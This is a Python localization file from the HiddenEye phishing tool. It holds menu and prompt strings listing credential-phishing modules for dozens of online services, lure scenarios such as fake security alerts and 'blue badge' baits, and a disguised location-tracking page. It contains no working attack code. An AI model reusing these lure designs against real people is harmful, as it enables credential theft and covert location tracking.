HiddenEye-Legacy/Defs/LocalizationManager/lang_action_manager/lang_main_runner.py
2020-07-12 20:32:19 +00:00

196 lines
7.1 KiB
Python

#
# HiddenEye Copyright (C) 2020 DarkSec https://dark-sec-official.com
# This program comes with ABSOLUTELY NO WARRANTY; for details read LICENSE.
# This is free software, and you are welcome to redistribute it
# under certain conditions; you can read LICENSE for details.
#
# Contains all ActionManager/main_runner.py translation strings
import Defs.ThemeManager.theme as theme
from Defs.LocalizationManager.localization import _
default_palette = theme.default_palette
def check_version(): # WILL BE MOVED FROM HERE
with open("version.txt") as f: # THIS WILL BE MOVED TOO
# ver_current = f.read() # DONT REMOVE THESE COMMENTS
# version = ver_current.strip() # TO-DO
return f.read().strip()
version = check_version()
lang_start_main_menu = {
"version_by_darksec": _(
" {2}[{0}v {3}{2}]{0} BY:DARKSEC{1}"
).format(default_palette[4], default_palette[2], default_palette[0], version),
"short_description": _(
"{1}[{0} Modern Phishing Tool With Advanced Functionality {1}]"
).format(default_palette[2], default_palette[0]),
"features_summary": _(
"{1}[{0} PHISHING-KEYLOGGER-INFORMATION COLLECTOR-ALL_IN_ONE_TOOL-SOCIALENGINEERING {1}]"
).format(default_palette[2], default_palette[0]),
"down_line": "{0}________________________________________________________________________________".format(
default_palette[0]
),
"attack_vector_message": _(
"------------------------\nSELECT ANY ATTACK VECTOR:\n------------------------"
),
"phishing_modules_header": _("\n{0}PHISHING-MODULES:").format(default_palette[0]),
"phishing_modules_list": [
[
"{0}[{1}01{0}]{1} Facebook",
"{0}[{1}13{0}]{1} Steam",
"{0}[{1}25{0}]{1} Badoo",
"{0}[{1}37{0}]{1} PlayStation",
],
[
"{0}[{1}02{0}]{1} Google",
"{0}[{1}14{0}]{1} VK",
"{0}[{1}26{0}]{1} CryptoCurrency",
"{0}[{1}38{0}]{1} Xbox",
],
[
"{0}[{1}03{0}]{1} LinkedIn",
"{0}[{1}15{0}]{1} iCloud",
"{0}[{1}27{0}]{1} DevianArt",
"{0}[{1}39{0}]{1} CUSTOM(1)",
],
[
"{0}[{1}04{0}]{1} GitHub",
"{0}[{1}16{0}]{1} GitLab",
"{0}[{1}28{0}]{1} DropBox",
"{0}[{1}40{0}]{1} CUSTOM(2)",
],
[
"{0}[{1}05{0}]{1} StackOverflow",
"{0}[{1}17{0}]{1} Netflix",
"{0}[{1}29{0}]{1} eBay",
],
[
"{0}[{1}06{0}]{1} WordPress",
"{0}[{1}18{0}]{1} Origin",
"{0}[{1}30{0}]{1} MySpace",
],
[
"{0}[{1}07{0}]{1} Twitter",
"{0}[{1}19{0}]{1} Pinterest",
"{0}[{1}31{0}]{1} PayPal",
],
[
"{0}[{1}08{0}]{1} Instagram",
"{0}[{1}20{0}]{1} ProtonMail",
"{0}[{1}32{0}]{1} Shopify",
],
[
"{0}[{1}09{0}]{1} Snapchat",
"{0}[{1}21{0}]{1} Spotify",
"{0}[{1}33{0}]{1} Verizon",
],
["{0}[{1}10{0}]{1} Yahoo", "{0}[{1}22{0}]{1} Quora", "{0}[{1}34{0}]{1} Yandex"],
[
"{0}[{1}11{0}]{1} Twitch",
"{0}[{1}23{0}]{1} PornHub",
"{0}[{1}35{0}]{1} Reddit",
],
[
"{0}[{1}12{0}]{1} Microsoft",
"{0}[{1}24{0}]{1} Adobe",
"{0}[{1}36{0}]{1} Subito.it",
],
],
"additional_modules": _("\n{0}ADDITIONAL-TOOLS:").format(default_palette[0]),
"additional_modules_list": [[_("{0}[{1}0A{0}]{1} Get Target Location")]],
"operation_mode": _("\nOperation mode:\n"),
"facebook_operation_modes": [
[
_("{0}[{1}1{0}]{1} Standard Page Phishing"),
_("{0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode)"),
],
[
_(
"{0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)"
),
_(
"{0}[{1}4{0}]{1} Facebook Phishing-Messenger Credentials(messenger_mode)"
),
],
],
"google_operation_modes": [
[
_("{0}[{1}1{0}]{1} Standard Page Phishing"),
_("{0}[{1}3{0}]{1} New Google Web"),
],
[_("{0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)")],
],
"instagram_operation_modes": [
[
_("{0}[{1}1{0}]{1} Standard Instagram Web Page Phishing"),
_(
"{0}[{1}4{0}]{1} Instagram Verified Badge Attack (Lure To Get Blue Badge)"
),
],
[
_("{0}[{1}2{0}]{1} Instagram Autoliker Phishing (To Lure The Users)"),
_("{0}[{1}5{0}]{1} Instafollower (Lure To Get More Followers)"),
],
[
_(
"{0}[{1}3{0}]{1} Instagram Advanced Scenario (Appears as Instagram Profile)"
)
],
],
"VK_operation_modes": [
[
_("{0}[{1}1{0}]{1} Standard VK Web Page Phishing"),
_("{0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)"),
]
],
"reddit_operation_modes": [
[_("{0}[{1}1{0}]{1} New reddit page"), _("{0}[{1}2{0}]{1} Old reddit page")]
],
"additional_module_location_operation_modes": [
[
_("{0}[{1}1{0}]{1} NEAR YOU (Webpage Looks Like Legitimate)"),
_(
"{0}[{1}2{0}]{1} GDRIVE (Asks For Location Permission To redirect GDRIVE)"
),
]
],
}
lang_start_phishing_page = {
"custom_folder_directory": _(
"\n {0}[{1}*{0}]{1} Custom Folder Directory is {0}WebPages/{page}"
).format(default_palette[0], default_palette[4], page="page"),
"manual_reading_suggestion": _(
"\n {0}[{1}*{0}]{1} Please Read The manual.txt File Available At {0}[WebPages/{page}]"
).format(default_palette[0], default_palette[4], page="page"),
"press_enter_to_continue_if_setup_correctly": _(
"\n {0}[{1}*{0}]{1} If You Have Set Up The Files Correctly, {0}Press Enter To continue."
).format(default_palette[0], default_palette[4]),
"copying_your_files": _(
"\n {0}[{1}*{0}]{1} Copying Your Files To Server/www Folder..."
).format(default_palette[0], default_palette[4]),
"https_suggestion": _(
"\n{0}[{1}*{0}]{1} PLEASE USE TUNNELS/URL WITH '{0}https{1}' \n{0}[{1}*{0}]{1} Browsers Trusts only Https Links To Share Location\n"
).format(default_palette[0], default_palette[4]),
"gdrive_suggestion": _(
"{0}[{1}*{0}]{1} {0}Tip: {1}Use Google Drive File Url as Custom Url while asked."
).format(default_palette[0], default_palette[4]),
}
lang_enter_custom_redirecting_url = {
"enter_redirecting_url_header": _(
"{0}\n-------------------------------\n{1}[ PUT YOUR REDIRECTING URL HERE ] {0}\n-------------------------------"
).format(default_palette[0], default_palette[2]),
"enter_redirecting_url_prompt": _(
"\n{0}[{1}*{0}]Insert a custom redirect url:"
).format(default_palette[0], default_palette[4]),
"redirect_here": _("\n{0}REDIRECT HERE>>> {1}").format(
default_palette[0], default_palette[2]
),
}
#
#